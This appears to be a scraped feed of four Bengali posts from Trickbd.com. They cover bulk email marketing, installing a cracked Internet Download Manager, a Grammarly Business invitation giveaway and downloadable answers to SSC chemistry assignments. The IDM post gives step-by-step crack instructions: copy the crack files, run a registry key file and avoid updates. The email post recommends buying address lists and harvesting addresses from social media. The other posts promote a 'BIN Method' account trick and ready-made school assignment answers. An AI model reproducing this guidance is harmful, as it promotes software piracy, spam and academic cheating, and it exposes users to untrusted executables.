তবে একসাথে একাধিক ইমেইল পাঠানোর জন্য গুগলে নানা ধরনের টুলস রয়েছে। এই টুলস এর সাহায্যে আপনারা কম সময়ে হাজার হাজার ইমেইল একসাথে পাঠাতে পারবেন। আপনার মনে প্রশ্ন আসতে পারে কিভাবে সম্ভব?, জিমেইল দিয়ে তো শুধু একটা ই-মেইল পাঠানো যাবে।

কিভাবে কম সময়ে একটি জিমেইল থেকে একাধিক ইমেইল করব? কখনোই আপনি নিজের ইমেইল দিয়ে একাধিক ইমেইল পাঠালে আপনাকে স্পাম এর আওতায় পড়ে একাউন্ট ব্যান হয়ে যাবে। এই ইমেইল একসাথে পাঠানোর জন্য টুলস এর প্রয়োজন। তাই আপনারা টুলস এর সাহায্যে কম সময় হাজার হাজার ইমেইল একসাথে পাঠাতে পারেন।

কোথা থেকে ই-মেইল সংগ্রহ করবো?

আপনি চাইলে ইমেইল নিজে খুঁজে নিতে পারেন। অথবা ইমেইল কিনে খুব সহজে নিতে পারেন।তাছাড়া আপনি আরও কিছু মাধ্যমে ইমেইল পেতে পারেন। তা নিচে দেওয়া হল:

ওয়েবসাইটের মাধ্যমে: বিভিন্ন ওয়েবসাইট রয়েছে যেখানে দেখবেন সাবস্ক্রিপশন একটি বক্স রয়েছে। এই বক্সে যে কেউ সাবস্ক্রিপশন করলেই ইমেইল টা তাদের কাছে চলে যায়। আপনিও চাইলে আপনার ওয়েবসাইটে সাবস্ক্রিপশন অপশনটি চালু করে খুব সহজেই একাধিক ইমেইল পেয়ে যাবেন।

বিভিন্ন সোশ্যাল মিডিয়াতে: আপনি চাইলে ফেসবুক টুইটার ইনস্টাগ্রাম সহ সকল সোশ্যাল মিডিয়াতে বিভিন্ন ইমেইল এড্রেস সংগ্রহ করতে পারেন। কারণ এই মিডিয়াগুলোতে সব সময় মানুষ থাকে। তাই আপনারা চাইলে বিভিন্ন সোশ্যাল মিডিয়াতে খুব সহজেই ইমেইল খুঁজে নিতে পারবেন আপনি নিজেই।

ইমেইল ক্রয়ের মাধ্যমে: হ্যাঁ বিভিন্ন প্ল্যাটফর্ম রয়েছে যেখান থেকে ইমেইল বিক্রি করা হয়। আপনারা চাইলে সে মাধ্যমিক থেকে খুব সহজেই ইমেইল ক্রয় করে নিতে পারবেন। তবে তার জন্য আপনাকে তাদেরকে প্রেমেন্ট করতে হবে। আপনি আমি হয়তো কেউই চাইবো না ইমেইল অ্যাড্রেস ক্রয় করতে। তাই সর্বপ্রথম ইমেইল মার্কেটিং ফ্রিতে করুন। কারণ ইমেইল মার্কেটিং তো ফ্রিতে ও আপনি করতে পারছেন তাই!

পাঠকের কাছে সঠিকভাবে ইমেইল পাঠান?

আপনি যদি পাঠকের কাছে ইমেল যেকোনোভাবে পাঠান তাহলে পাঠক দেখবে কিন্তু আকৃষ্ট হবে না। যেটা আপনারই লস হওয়ার সম্ভাবনা। তাই পাঠকের কাছে খুব সুন্দর ভাবে ইমেইলটি উপস্থাপন করার চেষ্টা করবেন।

সহজভাবে তাদেরকে সকল তথ্য জানিয়ে দিবেন যেন তারা সহজেই সবকিছু সুন্দরভাবে বুঝতে পারে। কখনোই ভুল ইনফর্মেশন অথবা ফেইক তথ্য কাউকে পাঠাবেন না। যেটা আপনার জন্য খুবই মারাত্মক হয়ে উঠবে।

গ্রাহককে আকৃষ্ট করুন অফার দিয়ে: হ্যাঁ আপনি চাইলে কোন পণ্য অফার এর মাধ্যমে গ্রাহকের কাছে দিতে পারেন। যেটা খুব সহজেই গ্রাহকেরা আকৃষ্ট হয়ে প্রোডাক্ট টি নিতে চাইবে। এবং আপনার ব্যবসা বা প্রতিষ্ঠান থেমে থাকবে। যেটা আপনার জন্য খুবই দারুণ এক ব্যাপার।

গুরুত্বপূর্ণ কিছু পরামর্শ

*আপনি যদি ইমেইল মার্কেটিং করতে চান অবশ্যই নিজের পরিশ্রম নিয়ে এগিয়ে যান।

*ইমেইল মার্কেটিং এর জন্য অবশ্যই তাদের কাছে সুন্দর বিবরণ দিবেন তথ্যবহুল।

*গ্রাহকদের সাথে সুন্দর ব্যবহার করবেন যেন তারা কোনো কষ্ট না পায়।

*ফেইক বা ভুল ইনফরমেশন কখনোই গ্রাহকের কাছে দিবেন না।

*ইমেইল মার্কেটিং এর জন্য গুগল থেকে টুলস ব্যবহার করবেন।

*পরিশেষে নিজের পরিশ্রম ধৈর্য সততা ভদ্রতা নিয়ে কাজ করতে থাকুন।

আর্টিকেল এর শেষ কথা

আজকের আর্টিকেলটি এ পর্যন্তই। আর্টিকেলটি ভালো লাগলে অবশ্যই কমেন্ট করতে ভুলবেন না। সবাই ভাল থাকুন সুস্থ থাকুন এবং নিরাপদে থাকুন। আসসালামুআলাইকুম ওয়ারাহমাতুল্লাহি ওয়াবারাকাতুহ।

The post ইমেইল মার্কেটিং করে অনলাইন থেকে ইনকাম? appeared first on Trickbd.com.

IDM – Internet Download Manager 6.38.25 (September 2021)

Posted:

ইন্টারনেট ডাউনলোড ম্যানেজার নিয়ে অনেকেই অনেক সমস্যার সম্মুখিন হয়ে থাকেন । আজকে আপনার জন্য নিয়ে এলাম একদম ১০০% ফুল ফার্সন এবং লেটেস্ট ডাউনলোড ম্যানেজার। কোনো সময় এটার লাইসেন্স এক্সপায়ার হবে না। একদম লাইফ টাইম একটিভেট করা। তাহলে বেশি দেরি না করে চলুন বিস্তারিত জেনে নেওয়া যাক । আর্টিকেলটা ask4pc থেকে নেওয়া হয়েছে ।

IDM বা ইন্টারনেট ডাউনলোড ম্যানেজার 6.38 বিল্ড 25 এই নতুন সংস্করণে ডেভেলপাররা বিভিন্ন ধরণের ভিডিও স্ট্রীম ডাউনলোড এবং শেয়ারিং এবং অন্যান্য ওয়েব সাইট থেকে উন্নত ডাউনলোডের সমস্যা সমাধান করেছে ।

ডাউনলোড ম্যানেজারের ডাউনলোড স্পিড সর্বোচ্চ আগের চেয়ে বৃদ্ধি করেছে । আমরা নরমাল ব্রাউজারের যে ডাউনলোড করি তার চেয়ে প্রায় 5 গুণ পর্যন্ত বেশি স্পিড। নতুন IDM এ নতুন একটা ফিচার দিয়েছে সেটা হলো, ডাউনলোডে সমস্যা হলে এটা অটোম্যাটীক রিজুম করতে পারবে । মনে করেন আপনার পিসি হঠাৎ বন্ধ হয়ে গেলো অথবা ইন্টারনেট চলে গেলো বা নেটওয়ার্ক সমস্যা, কম্পিউটার শাটডাউন বা অপ্রত্যাশিত বিদ্যুৎ বিভ্রাটের কারণে যে কোনো কারণে ফাইল সমস্যা হলে ডাউনলোড ম্যানেজার আবার শুরু থেকে ডাউনলোড না করে আবার সেই যায়গা থেকে ডাউনলোড হওয়া শুরু করবে ।

ডাউনলোড ইঞ্জিনের কিছু বাগ ফিক্সড করা হয়েছেঃ

IDM – Internet Download Manager 6.38.25 (May 2021)
ছবিঃ Ask4pc.net

এছাড়াও, পূর্ববর্তী ক্র্যাক ফাইলে অনেক ব্যবহারকারীদের "ভুয়া সিরিয়াল কী পপআপ" নিয়ে সমস্যা হচ্ছিল যা খুব বিরক্তিকর ।

IDM – Internet Download Manager 6.38.25 (May 2021)

ছবিঃ Ask4pc.net

ফিচার্স

Features of IDM Internet Download Manager :
ফিচার্স
Easy downloading with one click. When you click on a download link in a browser, IDM will take over the download and accelerate it. Video grabber. Internet Download Manager can record and download FLV videos from popular sites like MySpaceTV, Youtube, and many more.
Download Speed Acceleration. Internet Download Manager can accelerate downloads by up to 5 times due to its intelligent dynamic file segmentation technology. Download Resume. Internet Download Manager will resume unfinished downloads from the place where they left off.
Automatic Antivirus checking. Antivirus checking makes your downloads free from viruses and trojans. IDM can automatically run a scanner on download completion, Advanced Browser Integration. When enabled, the feature can be used to catch any download from any application. None of the download managers have this feature.
ফিচার্স
কি কি থাকছে নতুন IDM 6.38 Build 25 : এ
কি কি থাকছে নতুন IDM এ
Improved download engine
Fixed bugs
কি কি থাকছে নতুন IDM এ

ডাউনলোড সেকশনঃ

কিভাবে ইন্সটল করবেন?

পুরাতন বা আগের কোনো IDM থাকলে সেটা আগে আন ইন্সটল করে ফেলুন ।

ইন্সটল "idman638b25(ask4pc).exe".

IDM – Internet Download Manager 6.38.25 (May 2021)

ছবিঃ Ask4pc.net

ইন্সটল হয়ে গেলে রান করবেন না । Exit বাটনে ক্লিক করে Exit করবেন ।

IDM – Internet Download Manager 6.38.25 (May 2021)

ছবিঃ Ask4pc.net

স্টেপ ৪

এখন "solution" ফোল্ডারে থাকা সব ফাইল গুলো কপি করেন ।

ওপেন "Paste Here" ফোল্ডারে নিয়ে গেলে সব গুলো কপি করা ফাইল ঐ ফোল্ডারে পেস্ট করুন ।

IDM – Internet Download Manager 6.38.25 (May 2021)

ছবিঃ Ask4pc.net

"Key (Run This).reg" ফাইলে ডাবল ক্লিক করে ওপেন করুন এবংYes এ ক্লিক করুন ।

এবার আপনি আপনার পিসির স্টার্ট মেনু অথবা ডেস্কটপ থেকে IDM ওপেন করতে পারেন ।

IDM – Internet Download Manager 6.38.25 (May 2021)

ছবিঃ Ask4pc.net

সর্বশেষেঃ অবশ্যই আগের ইন্সটল করা IDM আনইন্সটল করে এরপরে ইন্সটল করার ট্রাই করবেন। এবং নতুন IDM আপডেট করা থেকে বিরত থাকবেন ।

ব্যাস কাজ শেষ । এবার আরামসে IDM ইউজ করেন কোনো ঝামেলা ছাড়া । কোনো সমস্যা হলে কমেন্টস করে জানাতে পারেন । আশা করি হেল্প করতে পারবো।

আজকের মত বিদায় । ভালো থাকুন, সুস্থ থাকুন । আল্লাহ্‌ হাফেজ ।

লিখেছেনঃ MH Mamun

The post IDM – Internet Download Manager 6.38.25 (September 2021) appeared first on Trickbd.com.

50x Grammarly Business Account Invitation শুধুমাত্র ৭ দিনের জন্য

Posted:

Howdy Everyone,

Grammarly হল একটা Writing Tool, যা আপনার লেখার ত্রুটিগুলো আপনার সামলে তুলে ধরে খুব সহজেই। আমরা অনেক সময় Email, Lab_report,presentation তৈরীর সময় ভাষাগত অনেক ভুল করে থাকি যা খুবই কষ্টের কথা। কিন্তু Grammarly তা auto detact করে খুজে বের করে দিবে এবং শুদ্ধটাও Replace করে দিবে। মূলত English এর ভূল ধরতে এটি সক্ষম।

যেসব Features থাকছে Grammarly Business Account এ:-

  • All premium features
  • Company style guide
  • Centralized billing
  • Team usage statistics
  • Priority email support
  • User management tool

অনেকেই BIN Method এ এই process Claim করতে পারেন না বা সমস্যাface করেন তাই আপনার জন্য Grammarly Business Invitation পাঠাবো আপনার নিজস্ব E-mail এ।

 

 

⁙⁘About Giveaway⁘⁙

 

1. Comment এ আপনাকে আপনার Email Address টি দিতে হবে, যেটার Access আছে আপনার কাছে

 

2. আমার Invitation এর জন্য Wait করবেন, Comment এ reply দেয়া হব invitation দেয়ার পর

 

3. তারপর আপনার Mail box check করেন

 

 

4. যদি Invitation mail না দেখা যায় তবে Search bar এ Grammarly লিখে সার্চ করুন

 

5. তখন Invitation mail পেয়ে যাবেন

 

 

6. join Team এ Click করে Log in / Sign Up করলেই Grammarly Business Features উপভোগ করতে পারবেন


 

 

🎥 Tutorial ( কীভাবে Invite করলাম + কীভাবে Invitation Receive করলাম)

 

✓ one day left free vector eps, cdr, ai, svg vector illustration graphic artপ্রথম 50টি Comment Accept করব শুধুমাত্র

 

 

Bye ツ
Connect With Me Through Telegram

Subscribe Me On Youtube 

The post 50x Grammarly Business Account Invitation শুধুমাত্র ৭ দিনের জন্য appeared first on Trickbd.com.

SSC 21 এর রসায়ন অ্যাসাইনমেন্ট এর সমাধান নিয়ে নিন .txt আকারে —(8 th Week) [Java User Must See]

Posted:

আস্সালামুআলাইকুম। আশা করি সবাই আল্লাহ তাআলার অশেষ রহমতে ভালো আছেন। আপনাদের দোয়ায় আমিও ভালো আছি।
.
আজকে আমি একটা নতুন এবং হেল্পফুল পোষ্ট নিয়ে আপনাদের সামনে হাজির হয়েছি।
.
আশা করি সবার উপকারে আসবে। সবাই ধৈর্য ধরে সবাই পোষ্ট টা পরবেন আর কিছু না বুজলে কমেন্ট বক্সে কমেন্ট করেন। তো শুরু করা যাক।
.
অনেকেই হয়ত টাইটেল দেখে বুঝে গেছেন কি নিয়া আলোচনা করব।
.

আজকে হাজির হয়ে গেলাম অ্যাসাইনমেন্টের সমাধান নিয়ে। আপনারারা জানেন যে আবার অ্যাসাইনমেন্ট টাস্ক চালু হয়েছে ৬ষ্ঠ থেকে দ্বাদশ শ্রেণির।
.
তো এই পোষ্টে আপনি ssc 2021 এর রসায়ন ৮ম সপ্তাহের অ্যাসাইনমেন্টের সমাধান ডাউনলোড করতে পারবেন।
.

Answer Of 1 Subject Of SSC 2021

রসায়ন অ্যাসাইনমেন্ট এর সমাধান
নিয়ে নিন।
নিচে অ্যাসাইনমেন্ট এর
সমাধানের .txt ফাইল
দেয়া হলো..
.

রসায়ন এর ৮ম সপ্তাহের অ্যাসাইনমেন্ট এর সমধান
.
Download

বিঃ দ্রঃ- .txt ফাইলটি আমি মুলত জাভা ইউজার দের জন্য তৈরি করছি। আপনি যদি অ্যান্ড্রয়েড দিয়ে এই ফাইলটি দেখতে চান তবে কিছুই দেখতে পারবেন না যদি না আপনি প্লে স্টোর থেকে টেক্সট রিডার ডাউনলোড করেন।

এন্ড্রয়েড ইউসার হলে প্লে স্টোর এ সার্চ করুন text reader তারপর অ্যাপটি ডাউনলোড করে নিন এবং ট্রেক্সট গুলো পড়ুন। আবার কিছু এন্ড্রয়েডে টেক্সট সাপোর্ট করে যেমন আমার ফোনে করে।

.
তো ভালো থাকুন সুস্থ্য থাকুন ট্রিক বিডির সাথে থাকুন ট্রিক বিডি নিয়ম কানুন মেনে চলুন আর ট্রিক বিডি কে আরো উন্নত করতে বেশি বেশি উন্নত পোষ্ট করুন!
.

আরো পড়ুন

ভাইবারের কথা বলুন একদম ফ্রিতেই যেকোনো নাম্বারে

কেনো আপনি ভালো ইন্টারনেট গতি পান না?? দেখে নিন কিভাবে বাড়াবেন আপনার ইন্টারনেট গতি!!

তাহলে আজকে এই পর্যন্তই ভালো থাকুন সুস্থ থাকুন আমাদের সাইটের সঙ্গেই থাকুন আল্লাহ হাফেজ।

খোদা হফেজ।

The post SSC 21 এর রসায়ন অ্যাসাইনমেন্ট এর সমাধান নিয়ে নিন .txt আকারে —(8 th Week) [Java User Must See] appeared first on Trickbd.com.

Post a Comment

0 Comments